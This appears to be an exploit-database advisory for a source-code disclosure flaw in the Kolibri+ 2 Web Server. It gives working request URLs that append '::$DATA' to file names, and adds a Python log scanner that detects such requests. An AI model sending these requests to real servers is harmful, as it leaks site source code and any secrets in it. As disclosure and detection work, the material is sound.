Vendor: Kolibri+ 2 Web Server
By: Dr_IDE
CVSS: 7.5 (HIGH)
Title: Remote Arbitrary Source Code Disclosure
CWE: 200
Product Name: Kolibri+ 2 Web Server
Affected Version From: Kolibri+ 2 Web Server
Affected Version To: Kolibri+ 2 Web Server
Patch Exists: NO
Related CWE: N/A
CPE: a:kolibri_plus:kolibri_plus_2_webserver
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XPSP3
2009

Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure

Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of the application available. This vulnerability is similar to the one reported earlier by Skull-HacKeR. Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure (download in this case) by the following means:

	http://[ webserver IP]/[ file ][::$DATA]

	http://172.16.2.101/default.asp::$DATA

	http://172.16.2.101/index.php::$DATA

Mitigation:

Ensure that the web server is configured to serve files only from the intended directory and from no other directory.
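The requests shown above name files inside the web root and the page lists no patch, so they have to be caught in front of the server or in its logs. The following is an added example, not code from the advisory or from the Kolibri+ project: it flags request targets that carry NTFS stream syntax such as `::$DATA`, assuming Common Log Format access logs and a site with no legitimate colon in any URL path; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so %3A and %253A both end up as ':'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_ntfs_stream_syntax(target):
    """True if the URL path names an NTFS stream (file:stream, file::$DATA).
    Assumption: no legitimate URL path on this site contains a colon, so any
    colon in the decoded path is treated as stream syntax."""
    path = target.split("?", 1)[0].split("#", 1)[0]  # ignore query/fragment
    # Absolute-form targets (http://host:port/path) carry colons before the path.
    if not path.startswith("/") and "://" in path:
        path = "/" + path.split("://", 1)[1].partition("/")[2]
    return ":" in decode_fully(path)


def flag_log_lines(lines):
    """Return the request targets in `lines` that use stream syntax."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and has_ntfs_stream_syntax(match.group("target")):
            hits.append(match.group("target"))
    return hits


# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '172.16.2.50 - - [11/Sep/2009:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '172.16.2.50 - - [11/Sep/2009:10:00:02 +0000] "GET /index.php::$DATA HTTP/1.1" 200 2048',
    '172.16.2.50 - - [11/Sep/2009:10:00:03 +0000] "GET /default.asp%3A%3A%24DATA HTTP/1.1" 200 1024',
    '172.16.2.50 - - [11/Sep/2009:10:00:04 +0000] "GET /search?q=a:b HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print(flag_log_lines(SAMPLE_LOG))
```

The same `has_ntfs_stream_syntax` check can be used in a reverse proxy or request filter to reject such targets before they reach the server.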

Exploit-DB raw data:

#################################################################################
#                                                                        	#
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure 		#
# aka:		More fun with Kolibri+ 2 webserver 		         	#
# Found By:	Dr_IDE								#
# Tested On:	Windows XPSP3                                            	#
#                                                                        	#
#################################################################################

- Description -

Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available. 

This vulnerability is similar to the one reported earlier by Skull-HacKeR.

Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][::$DATA]

	http://172.16.2.101/default.asp::$DATA

	http://172.16.2.101/index.php::$DATA

# milw0rm.com [2009-09-11]